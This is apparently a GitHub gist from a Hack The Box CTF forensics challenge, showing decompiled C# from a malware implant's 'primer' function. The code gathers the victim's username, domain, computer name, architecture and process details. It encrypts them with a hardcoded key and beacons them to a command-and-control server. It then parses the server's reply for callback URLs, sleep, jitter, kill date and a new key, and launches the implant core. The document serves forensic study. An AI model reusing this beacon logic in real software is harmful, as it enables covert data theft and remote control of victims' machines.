Skip to content

Instantly share code, notes, and snippets.

@khr0x40sh
Created March 23, 2023 20:04
Show Gist options
  • Save khr0x40sh/476e350578b892efb6011d4a20e10048 to your computer and use it in GitHub Desktop.
Save khr0x40sh/476e350578b892efb6011d4a20e10048 to your computer and use it in GitHub Desktop.
HTB:CA2023 Forensics Interstellar Primer C2 Function
// Program
// Token: 0x06000011 RID: 17 RVA: 0x000025C8 File Offset: 0x000007C8
private static void primer()
{
if (DateTime.ParseExact("2025-01-01", "yyyy-MM-dd", CultureInfo.InvariantCulture) > DateTime.Now)
{
Program.dfs = 0;
string text = "";
try
{
text = WindowsIdentity.GetCurrent().Name;
}
catch
{
text = Environment.UserName;
}
if (Program.ihInteg())
{
text += "*";
}
string userDomainName = Environment.UserDomainName;
string environmentVariable = Environment.GetEnvironmentVariable("COMPUTERNAME");
string environmentVariable2 = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int id = Process.GetCurrentProcess().Id;
string processName = Process.GetCurrentProcess().ProcessName;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string text2 = null;
string text3 = null;
foreach (string text4 in Program.basearray)
{
string un = string.Format("{0};{1};{2};{3};{4};{5};1", new object[]
{
userDomainName,
text,
environmentVariable,
environmentVariable2,
id,
processName
});
string key = "DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc=";
text3 = text4;
string address = text3 + "/Kettie/Emmie/Anni?Theda=Merrilee?c";
try
{
string enc = Program.GetWebRequest(Program.Encryption(key, un, false, null)).DownloadString(address);
text2 = Program.Decryption(key, enc);
break;
}
catch (Exception ex)
{
Console.WriteLine(string.Format(" > Exception {0}", ex.Message));
}
Program.dfs++;
}
if (string.IsNullOrEmpty(text2))
{
throw new Exception();
}
Regex regex = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
Match match = regex.Match(text2);
string randomURI = match.Groups[1].ToString();
regex = new Regex("URLS10484390243(.*)34209348401SLRU");
match = regex.Match(text2);
string stringURLS = match.Groups[1].ToString();
regex = new Regex("KILLDATE1665(.*)5661ETADLLIK");
match = regex.Match(text2);
string killDate = match.Groups[1].ToString();
regex = new Regex("SLEEP98001(.*)10089PEELS");
match = regex.Match(text2);
string sleep = match.Groups[1].ToString();
regex = new Regex("JITTER2025(.*)5202RETTIJ");
match = regex.Match(text2);
string jitter = match.Groups[1].ToString();
regex = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
match = regex.Match(text2);
string key2 = match.Groups[1].ToString();
regex = new Regex("IMGS19459394(.*)49395491SGMI");
match = regex.Match(text2);
string stringIMGS = match.Groups[1].ToString();
Program.ImplantCore(text3, randomURI, stringURLS, killDate, sleep, key2, stringIMGS, jitter);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment